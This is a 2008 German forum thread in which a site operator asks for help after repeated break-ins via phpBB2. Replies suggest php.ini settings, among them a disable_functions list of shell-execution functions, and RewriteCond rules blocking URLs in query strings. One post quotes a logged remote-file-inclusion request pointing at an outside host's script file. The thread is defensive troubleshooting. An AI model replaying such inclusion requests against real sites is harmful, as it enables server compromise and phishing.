phishing scheme, wie server absichern?

Beitrag von **mauri** » 23.06.2008, 16:44

etwas angenervt, vor drei monaten gabs bei mir eine url injection, mit nem troja.
ok, eigene schuld, hatte update vor mich hingeschoben.
einen monat danach, hatte ich einen "Fraudulent Web Site Found on Server", machten soweit man weiss alles dicht.
nun heute das selbe wieder, nur mit dem unterschied, das die jungs die datei schon vor mir geloescht haben!?
fuehlt sich an, als sei bei mir offenes haus und die kommen und gehen, wie sie wollen.

wie sichert ihr euch ab?

von **Anzeige von ABAKUS** »

Beitrag von **Pompom** » 23.06.2008, 16:56

fuehlt sich an, als sei bei mir offenes haus und die kommen und gehen, wie sie wollen.

So wird es wohl dann auch sein.

Ohne dass du verrätst was für BS/Software usw. du nutzt, wird dir keiner sagen können, was du falsch machst. Hast du überhaupt was gegen die Zecken gemacht, wenn ja: Was.

Beitrag von **mauri** » 23.06.2008, 17:09

sie steigen dauernd ueber phpbb2 ein.
update phpbb

global flag off, nach dem ersten phishing.
CSf installed

Beitrag von **Pompom** » 23.06.2008, 19:12

Grundsätzlich ist es immer ein Problem, wenn man einen Systemeinbruch hatte. U.u. wurden bei nicht sicherem System Backdoors usw. installiert, die den Zecken auch das Komprimittieren des Systems zu einem späteren Zeitpunkt erlauben.

Hier hilft oft nur noch ein komplettes neu Aufsetzen des Betriebssystems.

Innerhalb von PHP gibt es auch die Möglichkeit, in der php.ini weitere Sicherheitseinstellungen vorzunehmen über

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

Falls die Funktionen nicht für deine Programme benötigt sind, solltest du folgende Funktionen noch auf off setzen.

register_globals
allow_url_fopen
file_upload
allow_url_include

Ein weiterer Ansatz wäre hier der Einsatz der suhosin extension
https://wiki.estudy-portal.de/index.php/Suhosin

Inwieweit phpbb2 dann noch lauffähig ist, kann ich nicht sagen, da ich dieses nicht (mehr) einsetze.

Beitrag von **mauri** » 24.06.2008, 09:20

danke dir, ja an der ini haben wir auch wieder was gemacht.
register_globals
allow_url_fopen
file_upload
allow_url_include

sind nun auch off

Suhosin schaue ich mir mal an, nicht kenne.

system neu aufsetzen...

bin dran an phpbb3, aber da sind noch so viele mods in beta...das es mir kraust...

Beitrag von **marc75** » 24.06.2008, 09:40

im phpbb2 gibt/gab es für die User die Möglichkeit Bilder unter Ihrem Benuterkonto abzulegen, dazu konnte man ein normales Upload machen oder auch ein Bild über eine URL uploaden. Nachdem ich vor Jahren die besagten PHP-Code Zeilen für das URL Upload entfernt hatte, war Ruhe mit solchen Sachen. Wobei ich nur einmal ein solches Problem hatte.

Beitrag von **Pompom** » 24.06.2008, 10:39

allow_url_fopen
file_upload
allow_url_include

dürfte reichen, da die meisten Hacks über das Laden eines Programmcodes über eine URL erfolgen.

Beitrag von **Ice Man** » 24.06.2008, 10:56

normal reicht es, folgendes zu tun

RewriteCond %{QUERY_STRING} ^(.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https\%3A\%2F\%2F(.*) [OR]

Damit ist der Aufruf von externen Scripten oder sonstigem nicht mehr möglich.

Beitrag von **mauri** » 25.06.2008, 03:12

na jetzt habe ich ja noch mal was in der hand, das ist doch mal was

Beitrag von **chiwawa** » 24.07.2008, 14:44

Ice Man hat geschrieben:normal reicht es, folgendes zu tun

RewriteCond %{QUERY_STRING} ^(.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=ftp\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=http\%3A\%2F\%2F(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)=https\%3A\%2F\%2F(.*) [OR]

Damit ist der Aufruf von externen Scripten oder sonstigem nicht mehr möglich.

Ich hab das auch eingebaut. Die meisten Versuche dieser Scriptaufrufe scheinen auch tatsächlich abgeblockt zu werden. Aber nicht alle irgendwie. Z.B. kam der hier durch:

[24/Jul/2008:04:35:16 +0200] "GET /index.php?pag=https://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 200 35131 "-" "libwww-perl/5.805"

Aber warum nur? Da ist doch eindeutig der http:// Aufruf drin. Warum gelang es dem? Der 200er HTTP Status heißt doch erfolgreich ?

Beitrag von **Nutzer0815** » 24.07.2008, 19:05

nun heute das selbe wieder, nur mit dem unterschied, das die jungs die datei schon vor mir geloescht haben!?
fuehlt sich an, als sei bei mir offenes haus und die kommen und gehen, wie sie wollen.
wie sichert ihr euch ab?

alta, ich weiss wie man sich fühlt - voll scheisse - kA wie man sich dagegen absichern kann